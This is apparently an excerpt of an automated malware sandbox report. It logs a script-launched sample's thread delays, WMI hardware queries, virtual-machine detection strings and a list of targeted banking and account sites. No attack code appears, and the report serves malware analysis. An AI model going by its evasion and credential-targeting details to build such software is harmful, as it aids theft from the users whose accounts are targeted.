Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597695	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597372	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596716	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596053	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595574	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595466	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595354	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595242	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594929	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594326	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593835	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593705	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593575	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593456	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593324	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593200	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593085	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592941	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592608	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591988	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591741	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591625	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2271	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1018	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3737	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6087	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 3697	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window / User API: threadDelayed 5925	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7884	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7956	Thread sleep count: 3737 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7944	Thread sleep count: 6087 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7988	Thread sleep time: -17524406870024063s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -27670116110564310s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7000	Thread sleep count: 3697 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -599718s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 7000	Thread sleep count: 5925 > 30	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -599593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -599465s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -599355s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -599249s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -599140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -599031s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598921s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598810s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598699s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598593s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598374s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598149s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -598039s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597812s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597695s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597372s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597265s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597155s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -597044s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596937s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596827s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596716s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596609s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596499s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596389s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596281s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596171s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -596053s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595922s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595574s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595466s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595354s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595242s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -595078s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -594929s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -594796s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -594625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -594484s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -594326s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -594124s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593984s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593835s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593705s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593575s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593456s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593324s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593200s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -593085s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -592941s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -592608s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -592343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -592156s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -591988s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -591859s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -591741s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 6148	Thread sleep time: -591625s >= -30000s	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * From Win32_ComputerSystem
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599718	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599465	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599355	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 599031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598810	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598699	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598374	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598149	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 598039	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597695	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597372	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597155	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 597044	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596827	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596716	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596499	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596389	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596281	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 596053	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595922	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595574	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595466	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595354	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595242	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594929	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594796	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594326	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 594124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593835	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593705	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593575	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593456	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593324	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593200	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 593085	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592941	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592608	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 592156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591988	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591741	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Thread delayed: delay time: 591625	Jump to behavior

Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VMware
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: nawomaqemuv
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qemucaqecet
Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: VirtualMachine: False
Source: AddInProcess32.exe, 00000009.00000002.1674833738.000000000148A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll6
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: tmpF3A4.tmp.dat.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: AddInProcess32.exe, 00000009.00000002.1740784660.0000000006230000.00000004.08000000.00040000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.0000000003FE8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: siqemuwalidilenigeg
Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000358D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmware
